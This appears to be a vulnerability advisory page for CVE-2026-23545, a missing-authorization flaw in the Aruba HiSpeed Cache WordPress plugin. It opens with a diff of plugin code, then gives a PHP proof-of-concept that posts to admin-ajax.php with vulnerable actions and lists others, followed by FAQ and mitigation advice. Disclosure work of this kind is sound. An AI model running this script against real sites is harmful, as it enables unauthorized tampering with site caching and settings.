+				AHSC_log(  'targhet ' . $_url, 'purgeUrl()'  );
+				// Logger.
+			}
+			// Logger.
+
+			$this->doRemoteGet( $_url );
+
+			delete_expired_transients(true);
+			$this->flush_wp_object_cache();
+
+			$this->cache_warmer();
+		}
+
+		/**
+		 * Purge the cache of a list of pages
+		 *
+		 * @param  array $urls The urls to purge.
+		 * @return void
+		 */
+		public function purgeUrls( $urls ) {
+			foreach ( $urls as $url ) {
+				$this->doRemoteGet( $url );
+
+				// Logger.
+				if(class_exists('ArubaSPAHiSpeedCacheDebugLogger')) {
+					// Logger.
+					AHSC_log(  'targhet ' . $url, 'purgeUrl()' );
+					// Logger.
+				}
+				// Logger.
+			}
+
+
+			delete_expired_transients(true);
+			$this->flush_wp_object_cache();
+
+			$this->cache_warmer();
+		}
+
+		/**
+		 * Purge the alla chace of site
+		 *
+		 * @return void
+		 */
+		public function purgeAll() {
+			// Logger.
+			global $logger;
+
+			if(class_exists('ArubaSPAHiSpeedCacheDebugLogger')) {
+				// Logger.
+				AHSC_log( 'targhet /', 'purgeAll()' );
+				// Logger.
+			}
+
+			$this->doRemoteGet( '/' );
+
+			delete_expired_transients(true);
+			$this->flush_wp_object_cache();
+
+			$this->cache_warmer();
+		}
+
+		/**
+		 * DoRemoteGet
+		 *
+		 * @param string $target path to purge.
+		 *
+		 * @return void
+		 */
+		public function doRemoteGet( $target = '/' ) {
+			$purgeUrl = $this->preparePurgeRequestUri( $target );
+
+			$blog_id = null;
+
+			if ( is_multisite() ) {
+				$blog_id = get_current_blog_id();
+			}
+
+			$host = wp_parse_url( get_site_url( $blog_id ) );
+			$host = $host['host'];
+
+			// Logger.
+			global $logger;
+
+			if(class_exists('ArubaSPAHiSpeedCacheDebugLogger')) {
+				// Logger.
+				AHSC_log( $purgeUrl, '_targhet' );
+				// Logger.
+			}
+			// Logger.
+
+			wp_remote_get(
+				$purgeUrl,
+				array(
+					'timeout' => $this->timeOut,
+					'headers' => array(
+						'Host' => $host,
+					),
+				)
+			);
+		}
+
+		/**
+		 * Whap form wp_cache_flush.
+		 *
+		 * @see https://developer.wordpress.org/reference/functions/wp_cache_flush/.
+		 *
+		 * @return bool
+		 */
+		public function flush_wp_object_cache() {
+			$wp_object_cache = wp_cache_flush();
+			if ( $wp_object_cache ) {
+				// Logger.
+				global $logger;
+
+				if(class_exists('ArubaSPAHiSpeedCacheDebugLogger') ) {
+					// Logger.
+					AHSC_log( 'flush wp_object_cache with success....' ,'flush_wp_object_cache');
+					// Logger.
+				}
+				// Logger.
+			}
+			return $wp_object_cache;
+		}
+
+		/**
+		 * This function adds a transient that will be read with each subsequent request and will trigger the cache warming action.
+		 * If the ahsc_cache_warmer option is set to true.
+		 *
+		 * @return void
+		 */
+		public function cache_warmer() {
+			//$option = $this->container->get_service( 'ahsc_get_option' );
+			$cache_warmer = AHSC_CONSTANT['ARUBA_HISPEED_CACHE_OPTIONS']['ahsc_cache_warmer'];// (bool) $option( 'ahsc_cache_warmer' );
+
+
+			if ( $cache_warmer ) {
+				$do_warmer=get_option('ahsc_do_cache_warmer',false);
+				//$do_warmer             = ahsc_has_transient( 'ahsc_do_cache_warmer' );
+				$do_warmer_log_message = 'Transint warmer present';
+
+				if ( ! $do_warmer ) {
+					$do_warmer_log_message = 'Transint warmer non presente presente lo imposto : ';
+					update_option('ahsc_do_cache_warmer',true);
+					//$_r=ahsc_set_transient( 'ahsc_do_cache_warmer', time(), MINUTE_IN_SECONDS );
+					//$do_warmer_log_message.=(string)$_r;
+				}
+				global $logger;
+				if(class_exists('ArubaSPAHiSpeedCacheDebugLogger') ) {
+					// Logger.
+					AHSC_log( $do_warmer_log_message, 'Cache Warmer' );
+					// Logger.
+				}
+			}
+		}
+
+	}
+	// phpcs:enable
+}
--- a/aruba-hispeed-cache/src/assets/AHSC_WPCT.php
+++ b/aruba-hispeed-cache/src/assets/AHSC_WPCT.php
@@ -1,365 +1,365 @@
-<?php
-if ( ! defined( 'ABSPATH' ) ) {
-	exit;
-}
-/**
- * Transforms a wp-config.php file.
- */
-class HASC_WPCT {
-	/**
-	 * Append to end of file
-	 */
-	const ANCHOR_EOF = 'EOF';
-
-	/**
-	 * Path to the wp-config.php file.
-	 *
-	 * @var string
-	 */
-	protected $wp_config_path;
-
-	/**
-	 * Original source of the wp-config.php file.
-	 *
-	 * @var string
-	 */
-	protected $wp_config_src;
-
-	/**
-	 * Array of parsed configs.
-	 *
-	 * @var array
-	 */
-	protected $wp_configs = array();
-
-	/**
-	 * Instantiates the class with a valid wp-config.php.
-	 *
-	 * @throws Exception If the wp-config.php file is missing.
-	 * @throws Exception If the wp-config.php file is not writable.
-	 *
-	 * @param string $wp_config_path Path to a wp-config.php file.
-	 */
-	public function __construct( $wp_config_path, $read_only = false ) {
-		$basename = basename( $wp_config_path );
-
-		if ( ! file_exists( $wp_config_path ) ) {
-			throw new Exception( esc_attr("{$basename} does not exist.") );
-		}
-
-		if ( ! $read_only && ! wp_is_writable( $wp_config_path ) ) {
-			throw new Exception( esc_attr("{$basename} is not writable.") );
-		}
-
-		$this->wp_config_path = $wp_config_path;
-	}
-
-	/**
-	 * Checks if a config exists in the wp-config.php file.
-	 *
-	 * @throws Exception If the wp-config.php file is empty.
-	 * @throws Exception If the requested config type is invalid.
-	 *
-	 * @param string $type Config type (constant or variable).
-	 * @param string $name Config name.
-	 *
-	 * @return bool
-	 */
-	public function exists( $type, $name ) {
-		$wp_config_src = file_get_contents( $this->wp_config_path );
-
-		if ( ! trim( $wp_config_src ) ) {
-			throw new Exception( 'Config file is empty.' );
-		}
-		// Normalize the newline to prevent an issue coming from OSX.
-		$this->wp_config_src = str_replace( array( "rn", "nr", "r" ), "n", $wp_config_src );
-		$this->wp_configs    = $this->parse_wp_config( $this->wp_config_src );
-
-		if ( ! isset( $this->wp_configs[ $type ] ) ) {
-			throw new Exception( esc_attr("Config type '{$type}' does not exist.") );
-		}
-
-		return isset( $this->wp_configs[ $type ][ $name ] );
-	}
-
-	/**
-	 * Get the value of a config in the wp-config.php file.
-	 *
-	 * @throws Exception If the wp-config.php file is empty.
-	 * @throws Exception If the requested config type is invalid.
-	 *
-	 * @param string $type Config type (constant or variable).
-	 * @param string $name Config name.
-	 *
-	 * @return string|null
-	 */
-	public function get_value( $type, $name ) {
-		$wp_config_src = file_get_contents( $this->wp_config_path );
-
-		if ( ! trim( $wp_config_src ) ) {
-			throw new Exception( 'Config file is empty.' );
-		}
-
-		$this->wp_config_src = $wp_config_src;
-		$this->wp_configs    = $this->parse_wp_config( $this->wp_config_src );
-
-		if ( ! isset( $this->wp_configs[ $type ] ) ) {
-			throw new Exception( esc_attr("Config type '{$type}' does not exist.") );
-		}
-
-		return $this->wp_configs[ $type ][ $name ]['value'];
-	}
-
-	/**
-	 * Adds a config to the wp-config.php

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-23545 - Aruba HiSpeed Cache <= 3.0.4 - Missing Authorization

<?php
/**
 * Proof of Concept for CVE-2026-23545
 * Aruba HiSpeed Cache WordPress Plugin Missing Authorization Vulnerability
 * 
 * This script demonstrates unauthorized access to administrative AJAX functions.
 * Requires a valid nonce which could be obtained through other means.
 */

// Configuration
$target_url = 'http://target-site.com/wp-admin/admin-ajax.php'; // Change this to target site
$action = 'ahsc_enable_purge'; // Vulnerable AJAX action
$nonce = 'VALID_NONCE_HERE'; // Requires a valid nonce (obtainable via other means)

// Initialize cURL session
$ch = curl_init();

// Set POST data
$post_data = array(
    'action' => $action,
    'ahsc_nonce' => $nonce
);

// Configure cURL options
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo "cURL Error: " . curl_error($ch) . "n";
} else {
    echo "HTTP Status: $http_coden";
    echo "Response: $responsen";
    
    // Analyze response
    if ($http_code == 200 && strpos($response, 'success') !== false) {
        echo "[+] Vulnerability likely EXISTS - Unauthenticated access succeededn";
    } else if ($http_code == 403 || strpos($response, 'nonce') !== false) {
        echo "[-] Nonce verification failed (requires valid nonce)n";
        echo "[-] Note: Nonce can be obtained via other means (XSS, info disclosure)n";
    } else {
        echo "[-] Unexpected response - may be patched or misconfiguredn";
    }
}

// Clean up
curl_close($ch);

// List of other vulnerable actions for testing
$vulnerable_actions = array(
    'ahsc_purge_homepage_on_edit',
    'ahsc_purge_page_on_new_comment',
    'ahsc_purge_archive_on_edit',
    'ahsc_cache_warmer',
    'ahsc_static_cache',
    'ahsc_lazy_load',
    'ahsc_html_optimizer',
    'ahsc_dns_preconnect',
    'ahsc_dns_preconnect_domain_list',
    'ahsc_enable_cron',
    'ahsc_cron_status',
    'ahsc_cron_time',
    'ahsc_xmlrpc_status',
    'ahsc_reset_options', // Note: This lacked nonce verification in vulnerable versions
    'ahsc_dboptimization'
);

echo "nOther vulnerable actions:n";
foreach ($vulnerable_actions as $vuln_action) {
    echo "- $vuln_actionn";
}

?>

Frequently Asked Questions

What is CVE-2026-23545?
Overview of the vulnerability
CVE-2026-23545 is a missing authorization vulnerability in the Aruba HiSpeed Cache plugin for WordPress, affecting versions up to and including 3.0.4. This vulnerability allows unauthenticated attackers to access administrative AJAX functions that should require authentication.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from improper registration of AJAX handlers for unauthenticated users. Attackers can send POST requests to the WordPress AJAX endpoint with the appropriate action parameter, allowing them to execute functions that should only be accessible to logged-in users with administrative privileges.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Aruba HiSpeed Cache plugin version 3.0.4 or earlier is affected by this vulnerability. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Aruba HiSpeed Cache plugin installed. If it is version 3.0.4 or earlier, your site is at risk. Additionally, review the plugin’s AJAX functionality for unauthorized access.
How can I fix this vulnerability?
Recommended actions for administrators
The vulnerability is fixed in version 3.0.5 of the Aruba HiSpeed Cache plugin. Administrators should update to this version immediately to mitigate the risk. It is also advisable to review user permissions and AJAX access.
What does the CVSS score of 5.3 indicate?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity level, meaning the vulnerability poses a moderate risk to affected systems. While it does not allow for remote code execution, it can lead to unauthorized control over the caching system.
What is the practical risk of this vulnerability?
Potential impacts on affected sites
The practical risks include unauthorized manipulation of the caching system, which can lead to denial of service, configuration changes, and performance degradation. Attackers can purge cached content or alter optimization settings.
What is nonce verification and how does it relate to this vulnerability?
Role of nonces in WordPress security
Nonce verification is a security feature in WordPress that helps ensure that requests to perform actions are legitimate. In this case, while some functions had nonce checks, the overall missing authorization allowed attackers to exploit the vulnerability even with valid nonces.
What does the proof of concept demonstrate?
Understanding the exploitation method
The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted POST request to the AJAX endpoint with an action parameter. It highlights the ease of unauthorized access to administrative functions, emphasizing the need for immediate patching.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the Aruba HiSpeed Cache plugin temporarily to prevent exploitation. Additionally, review server logs for any unauthorized access attempts and implement additional security measures such as firewall rules.
Is there any other information I should be aware of regarding this vulnerability?
Additional considerations
It is important to stay informed about security updates and vulnerabilities in plugins used on your WordPress site. Regularly check for updates and subscribe to security advisories to ensure your site remains secure.
How can I prevent similar vulnerabilities in the future?
Best practices for WordPress security
To prevent similar vulnerabilities, ensure that all plugins and themes are regularly updated, limit the use of untrusted plugins, and conduct regular security audits of your WordPress site. Implementing a web application firewall can also provide an additional layer of protection.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations